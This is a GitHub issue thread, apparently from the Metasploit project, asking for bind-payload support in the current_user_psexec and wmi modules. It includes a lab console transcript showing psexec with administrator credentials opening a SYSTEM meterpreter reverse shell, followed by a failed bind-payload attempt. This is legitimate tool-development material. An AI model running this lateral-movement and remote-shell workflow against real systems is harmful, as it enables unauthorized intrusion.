Ability to use bind payloads with wmi and current_user_psexec

[todb-r7]

This issue was RM8694, originally filed by by @rsmudge

I love windows/local/current_user_psexec and windows/local/wmi. I noticed though that I can't use bind payloads with these modules.

Sometimes, I'll capture an admin token or creds and need to take control of a system that can't stage to the internet. I usually use psexec_command to drop the firewall and then deliver a bind payload. It'd be nice if these modules supported this workflow.

[gwillcox-r7]

Seems to still be an issue, nearly 10 years later:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.153.132  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               test123          no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               test             no        The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.153.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set USERNAME Administrator
USERNAME => Administrator
msf6 exploit(windows/smb/psexec) > set PASSWORD theAdmin123
PASSWORD => theAdmin123
msf6 exploit(windows/smb/psexec) > set DOMAIN DAFOREST
DOMAIN => DAFOREST
msf6 exploit(windows/smb/psexec) > set RHOST 192.168.153.147
RHOST => 192.168.153.147
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.153.128:4444 
[*] 192.168.153.147:445 - Connecting to the server...
[*] 192.168.153.147:445 - Authenticating to 192.168.153.147:445|DAFOREST as user 'Administrator'...
[*] 192.168.153.147:445 - Selecting PowerShell target
[*] 192.168.153.147:445 - Executing the payload...
[+] 192.168.153.147:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (200774 bytes) to 192.168.153.147
[*] Meterpreter session 1 opened (192.168.153.128:4444 -> 192.168.153.147:61411) at 2023-02-01 10:03:10 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/psexec) > use exploit/windows/local/current_user_psexec 
[*] Using configured payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/local/current_user_psexec) > show options

Module options (exploit/windows/local/current_user_psexec):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DISPNAME                           no        Service display name (Default: random)
   INTERNAL_ADDRESS                   no        Session's internal address or hostname for the victims to grab the payload from (Default: detected)
   KERBEROS          false            yes       Authenticate via Kerberos, dont resolve hostnames
   NAME                               no        Service name on each target in RHOSTS (Default: random)
   RHOSTS                             no        Target address range or CIDR identifier
   SESSION                            yes       The session to run this module on
   TECHNIQUE         PSH              yes       Technique to use (Accepted: PSH, SMB)


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Universal



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/current_user_psexec) > set SESSION 1 
SESSION => 1
msf6 exploit(windows/local/current_user_psexec) > set RHOST 192.168.153.147
RHOST => 192.168.153.147
msf6 exploit(windows/local/current_user_psexec) > set LPORT 9933
LPORT => 9933
msf6 exploit(windows/local/current_user_psexec) > run

[*] Started bind TCP handler against 192.168.153.147:9933
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/current_user_psexec) > exploit

[*] Started bind TCP handler against 192.168.153.147:9933
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/current_user_psexec) > show options

Module options (exploit/windows/local/current_user_psexec):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DISPNAME                           no        Service display name (Default: random)
   INTERNAL_ADDRESS                   no        Session's internal address or hostname for the victims to grab the payload from (Default: detected)
   KERBEROS          false            yes       Authenticate via Kerberos, dont resolve hostnames
   NAME                               no        Service name on each target in RHOSTS (Default: random)
   RHOSTS                             no        Target address range or CIDR identifier
   SESSION           1                yes       The session to run this module on
   TECHNIQUE         PSH              yes       Technique to use (Accepted: PSH, SMB)


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     9933             yes       The listen port
   RHOST     192.168.153.147  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Universal



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/current_user_psexec) > 

[github-actions]

Thanks for your contribution to Metasploit Framework! We've looked at this issue, and unfortunately we do not currently have the bandwidth to prioritize this issue.

We've labeled this as attic and closed it for now. If you believe this issue has been closed in error, or that it should be prioritized, please comment with additional information.